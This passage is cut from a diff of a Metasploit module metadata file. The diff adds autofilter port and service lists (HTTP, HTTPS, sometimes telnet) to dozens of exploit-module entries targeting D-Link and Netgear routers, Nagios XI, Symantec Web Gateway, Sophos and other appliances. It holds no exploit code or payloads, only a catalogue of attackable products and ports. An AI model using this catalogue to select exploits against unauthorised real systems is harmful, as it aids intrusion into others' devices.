"rport": 80, + "autofilter_ports": [ + 23, + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "telnet", + "http", + "https" + ], "targets": [ "Automatic" ], @@ -34955,6 +46466,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -34991,6 +46517,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -35024,6 +46565,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "D-Link DIR-605L 1.13" ], @@ -35059,6 +46615,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -35093,6 +46664,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -35127,6 +46713,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsbe Payload", "Linux mipsel Payload" @@ -35160,6 +46761,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -35194,6 +46810,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "D-Link DSP-W215 - v1.02" @@ -35232,6 +46863,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600" ], @@ -35267,6 +46913,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting", "D-Link DSP-W215 - v1.0", @@ -35304,6 +46965,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -35339,6 +47015,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dlink DIR-818 / 822 / 823 / 850 [MIPS]", "Dlink DIR-868 (rev. B and C) / 880 / 885 / 890 / 895 [ARM]" @@ -35376,6 +47067,21 @@ "platform": "", "arch": "", "rport": 49152, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -35411,6 +47117,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -35443,6 +47164,21 @@ "platform": "", "arch": "", "rport": 2375, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux x64", "Python" @@ -35477,6 +47213,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Dolibarr 3.1.1 on Linux" ], @@ -35512,6 +47263,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -35546,6 +47312,21 @@ "platform": "Linux", "arch": "", "rport": 10443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux x86", "Linux x86_64" @@ -35579,6 +47360,21 @@ "platform": "Linux,Python", "arch": "", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Python", "Linux x86", @@ -35615,6 +47411,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "ESVA_2057" ], @@ -35649,6 +47460,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "F5 BIG-IP LTM 11.x" ], @@ -35681,6 +47507,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "F5 iControl" ], @@ -35717,6 +47558,21 @@ "platform": "Ruby", "arch": "ruby", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -35757,6 +47613,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -35792,6 +47663,21 @@ "platform": "Linux", "arch": "", "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Github Enterprise 2.8" ], @@ -35826,6 +47712,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Gitlist 0.4.0" ], @@ -35860,6 +47761,21 @@ "platform": "Linux", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (Reverse Shell)", "Automatic (Bind Shell)", @@ -35905,6 +47821,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -35939,6 +47870,12 @@ "platform": "Linux", "arch": "x86", "rport": 2947, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "gpsd-1.91-1.i386.rpm", @@ -35995,6 +47932,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "GroundWork 6.7.0" ], @@ -36028,6 +47980,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 8088, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36059,6 +48026,21 @@ "platform": "Linux", "arch": "x86", "rport": 2381, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "HP System Management 7.1.1 - Linux (CentOS)", "HP System Management 6.3.0 - Linux (CentOS)" @@ -36093,11 +48075,26 @@ "platform": "Linux,Unix", "arch": "cmd, x86, x64", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Unix In-Memory", "Linux Dropper" ], - "mod_time": "2018-08-24 18:08:15 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/linux/http/hp_van_sdn_cmd_inject.rb", "is_install_path": true, "ref_name": "linux/http/hp_van_sdn_cmd_inject", @@ -36125,6 +48122,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsbe Payload" ], @@ -36162,6 +48174,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "IBM QRadar SIEM <= 7.3.1 Patch 2 / 7.2.8 Patch 11" ], @@ -36195,6 +48222,21 @@ "platform": "Linux,Unix", "arch": "cmd", "rport": 444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -36231,6 +48273,21 @@ "platform": "Unix", "arch": "cmd", "rport": 444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -36264,6 +48321,21 @@ "platform": "Unix", "arch": "cmd", "rport": 444, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -36296,6 +48368,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36328,6 +48415,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36362,6 +48464,21 @@ "platform": "Unix", "arch": "cmd", "rport": 7778, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Kloxo / CentOS" ], @@ -36393,6 +48510,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "LifeSize UVC version <= 1.2.6" ], @@ -36427,6 +48559,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Generic", "Version 1.42.2", @@ -36468,6 +48615,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -36510,6 +48672,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsel Payload", "Linux mipsbe Payload" @@ -36546,6 +48723,21 @@ "platform": "Linux", "arch": "mipsle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsel Payload" ], @@ -36581,6 +48773,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -36618,6 +48825,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsel Payload" @@ -36652,6 +48874,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36683,6 +48920,21 @@ "platform": "Python", "arch": "python", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36718,6 +48970,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36755,6 +49022,21 @@ "platform": "", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux mipsel Payload", "Linux mipsbe Payload" @@ -36790,6 +49072,21 @@ "platform": "Linux", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Mutiny 5.0-1.07 Appliance (Linux)" ], @@ -36824,6 +49121,21 @@ "platform": "Linux", "arch": "armle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36856,6 +49168,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Nagios XI <= 5.2.7" ], @@ -36894,6 +49221,21 @@ "platform": "Linux", "arch": "x86", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Nagios XI 5.2.6 <= 5.4.12" ], @@ -36926,6 +49268,21 @@ "platform": "Linux", "arch": "mipsbe", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -36961,6 +49318,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsbe Payload" @@ -36997,6 +49369,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "CMD", "Linux mipsbe Payload" @@ -37031,6 +49418,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NETGEAR DDGN2200 Router" ], @@ -37067,6 +49469,21 @@ "platform": "Linux", "arch": "armle", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -37103,6 +49520,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NETGEAR ReadyNAS 4.2.23" ], @@ -37137,6 +49569,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "NETGEAR WNR2000v5" ], @@ -37173,6 +49620,12 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Ubuntu 13.04 32bit - nginx 1.4.0", "Debian Squeeze 32bit - nginx 1.4.0" @@ -37208,6 +49661,21 @@ "platform": "Unix", "arch": "cmd", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "NUUO NVRmini 2", @@ -37245,6 +49713,21 @@ "platform": "Unix", "arch": "cmd", "rport": 8081, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic", "NUUO NVRmini 2", @@ -37280,6 +49763,21 @@ "platform": "Linux,Unix", "arch": "", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -37314,6 +49812,21 @@ "platform": "Unix", "arch": "cmd", "rport": 446, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Targeting" ], @@ -37345,6 +49858,21 @@ "platform": "Unix", "arch": "cmd", "rport": 8023, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Pandora 5.0RC1" ], @@ -37378,6 +49906,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Pandora FMS version <= 5.0 SP2" ], @@ -37412,6 +49955,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -37445,6 +50003,12 @@ "platform": "Linux", "arch": "x86", "rport": 7144, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "PeerCast v0.1212 Binary" ], @@ -37478,6 +50042,21 @@ "platform": "Unix", "arch": "cmd", "rport": 7443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PineApp Mail-SeCure 3.70" ], @@ -37511,6 +50090,21 @@ "platform": "Unix", "arch": "cmd", "rport": 7443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PineApp Mail-SeCure 3.70" ], @@ -37545,6 +50139,21 @@ "platform": "Unix", "arch": "cmd", "rport": 7443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "PineApp Mail-SeCure 3.70" ], @@ -37576,6 +50185,21 @@ "platform": "Unix", "arch": "cmd", "rport": 1471, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WiFi Pineapple 2.0.0 - 2.3.0" ], @@ -37607,6 +50231,21 @@ "platform": "Unix", "arch": "cmd", "rport": 1471, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "WiFi Pineapple 2.0.0 - 2.3.0" ], @@ -37643,6 +50282,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic (piranha-gui-0.4.12-1.i386.rpm)" ], @@ -37681,6 +50335,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Auto" ], @@ -37716,6 +50385,21 @@ "platform": "Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -37749,6 +50433,21 @@ "platform": "Unix", "arch": "", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -37780,6 +50479,21 @@ "platform": "Linux", "arch": "x64", "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Linux" ], @@ -37815,6 +50529,21 @@ "platform": "", "arch": "", "rport": 52869, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Little Endian", "MIPS Big Endian" @@ -37847,6 +50576,21 @@ "platform": "Linux", "arch": "x64", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7" ], @@ -37883,6 +50627,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Samsung SRN-1670D 1.0.0.193" ], @@ -37919,6 +50678,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -37952,6 +50726,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Supermicro Onboard IPMI (X9SCL/X9SCM) with firmware SMT_X9_214" ], @@ -37985,6 +50774,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Sophos Web Protection Appliance 3.8.1.1" ], @@ -38021,6 +50825,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Sophos Web Protection Appliance 3.7.0" ], @@ -38056,6 +50875,21 @@ "platform": "Linux", "arch": "x86, x64", "rport": 9001, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "3.0a1-3.3.2" ], @@ -38088,6 +50922,21 @@ "platform": "Python", "arch": "python", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38124,6 +50973,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5.0.2.8" ], @@ -38160,6 +51024,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5.0.2.8" ], @@ -38196,6 +51075,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5.0.2.8" ], @@ -38232,6 +51126,21 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5.0.2.18" ], @@ -38268,6 +51177,21 @@ "platform": "Unix", "arch": "cmd", "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Symantec Web Gateway 5" ], @@ -38300,6 +51224,21 @@ "platform": "Unix", "arch": "cmd", "rport": 5000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38333,6 +51272,21 @@ "platform": "PHP", "arch": "php", "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic Target" ], @@ -38364,6 +51318,23 @@ "platform": "Unix", "arch": "cmd", "rport": 80, + "autofilter_ports": [ + 23, + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "telnet", + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38403,6 +51374,21 @@ "platform": "", "arch": "", "rport": 7547, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "MIPS Big Endian", "MIPS Little Endian" @@ -38436,6 +51422,21 @@ "platform": "Python", "arch": "python", "rport": 8445, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Automatic" ], @@ -38469,6 +51470,21 @@ 